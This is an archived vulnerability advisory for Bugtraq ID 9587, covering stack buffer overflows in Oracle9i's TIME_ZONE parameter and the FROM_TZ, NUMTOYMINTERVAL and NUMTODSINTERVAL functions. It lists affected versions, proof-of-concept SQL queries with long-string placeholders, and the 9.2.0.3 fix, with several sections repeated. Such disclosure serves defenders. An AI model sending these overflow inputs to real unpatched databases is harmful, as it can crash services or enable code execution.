Multiple Oracle Database Parameter/Statement Buffer Overflow Vulnerabilities
BID:9587
Info
Multiple Oracle Database Parameter/Statement Buffer Overflow Vulnerabilities
| Bugtraq ID: | 9587 |
| Class: | Boundary Condition Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 05 2004 12:00AM |
| Updated: | Feb 05 2004 12:00AM |
| Credit: | Discovery credited to NGSSoftware. |
| Vulnerable: |
Oracle Oracle9i Standard Edition 9.2 .0.2 Oracle Oracle9i Standard Edition 9.2 .0.1 Oracle Oracle9i Standard Edition 9.2 Oracle Oracle9i Standard Edition 9.0.2 Oracle Oracle9i Standard Edition 9.0.1 .4 Oracle Oracle9i Standard Edition 9.0.1 .3 Oracle Oracle9i Standard Edition 9.0.1 .2 Oracle Oracle9i Standard Edition 9.0.1 Oracle Oracle9i Standard Edition 9.0 Oracle Oracle9i Personal Edition 9.2 .0.2 Oracle Oracle9i Personal Edition 9.2 .0.1 Oracle Oracle9i Personal Edition 9.2 Oracle Oracle9i Personal Edition 9.0.1 Oracle Oracle9i Enterprise Edition 9.2 .2 Oracle Oracle9i Enterprise Edition 9.2 .0.1 Oracle Oracle9i Enterprise Edition 9.2 .0 Oracle Oracle9i Enterprise Edition 9.0.1 |
| Not Vulnerable: |
Oracle Oracle9i Standard Edition 9.2 .0.3 Oracle Oracle9i Personal Edition 9.2 .0.3 Oracle Oracle9i Enterprise Edition 9.2 .0.3 |
Discussion
Multiple Oracle Database Parameter/Statement Buffer Overflow Vulnerabilities
Oracle database has been reported prone to multiple buffer overflow vulnerabilities when processing certain parameters and functions. Specifically the TIME_ZONE parameter, NUMTOYMINTERVAL, NUMTODSINTERVAL and FROM_TZ functions. Excessive data passed to any of the aforementioned parameters/statements may potentially overrun the bounds of a buffer in stack-based memory. This may result in the corruption of memory adjacent to the affected buffer, and ultimately may provide for arbitrary code execution.
Oracle database has been reported prone to multiple buffer overflow vulnerabilities when processing certain parameters and functions. Specifically the TIME_ZONE parameter, NUMTOYMINTERVAL, NUMTODSINTERVAL and FROM_TZ functions. Excessive data passed to any of the aforementioned parameters/statements may potentially overrun the bounds of a buffer in stack-based memory. This may result in the corruption of memory adjacent to the affected buffer, and ultimately may provide for arbitrary code execution.
Exploit / POC
Multiple Oracle Database Parameter/Statement Buffer Overflow Vulnerabilities
The following proof-of-concepts have been made available by NGS Software:
SELECT FROM_TZ(TIMESTAMP '2000-03-28 08:00:00','long string here') FROM DUAL;
SELECT last_name, hire_date, salary, SUM(salary) OVER (ORDER BY hire_date RANGE NUMTOYMINTERVAL(1,'<long string here>') PRECEDING) AS t_sal FROM employees;
SELECT empno, ename, hiredate, COUNT(*) OVER (PARTITION BY empno ORDER BY hiredate RANGE NUMTODSINTERVAL(100, '<long string here>') PRECEDING) AS t_count FROM emp;
ALTER SESSION SET TIME_ZONE = '<long string here>'; SELECT CURRENT_TIMESTAMP, LOCALTIMESTAMP FROM DUAL;
The following proof-of-concepts have been made available by NGS Software:
SELECT FROM_TZ(TIMESTAMP '2000-03-28 08:00:00','long string here') FROM DUAL;
SELECT last_name, hire_date, salary, SUM(salary) OVER (ORDER BY hire_date RANGE NUMTOYMINTERVAL(1,'<long string here>') PRECEDING) AS t_sal FROM employees;
SELECT empno, ename, hiredate, COUNT(*) OVER (PARTITION BY empno ORDER BY hiredate RANGE NUMTODSINTERVAL(100, '<long string here>') PRECEDING) AS t_count FROM emp;
ALTER SESSION SET TIME_ZONE = '<long string here>'; SELECT CURRENT_TIMESTAMP, LOCALTIMESTAMP FROM DUAL;
Solution / Fix
Multiple Oracle Database Parameter/Statement Buffer Overflow Vulnerabilities
Solution:
These issues are reportedly addressed in Oracle 9i Database Release 2, version 9.2.0.3. This has not been confirmed by Symantec.
Oracle fixes are available for customers through the metalink website. To obtain fixes visit:
http://metalink.oracle.com
Solution:
These issues are reportedly addressed in Oracle 9i Database Release 2, version 9.2.0.3. This has not been confirmed by Symantec.
Oracle fixes are available for customers through the metalink website. To obtain fixes visit:
http://metalink.oracle.com
References
Multiple Oracle Database Parameter/Statement Buffer Overflow Vulnerabilities
References:
References:
- Oracle FROM_TZ Remote System Buffer Overrun (NGSSoftware)
- Oracle NUMTODSINTERVAL Remote System Overflow (NGSSoftware)
- Oracle NUMTOYMINTERVAL Remote System Overflow (NGSSoftware)
- Oracle Support Metalink (Oracle)
- Oracle TIME_ZONE Remote System Buffer Overrun (NGSSoftware)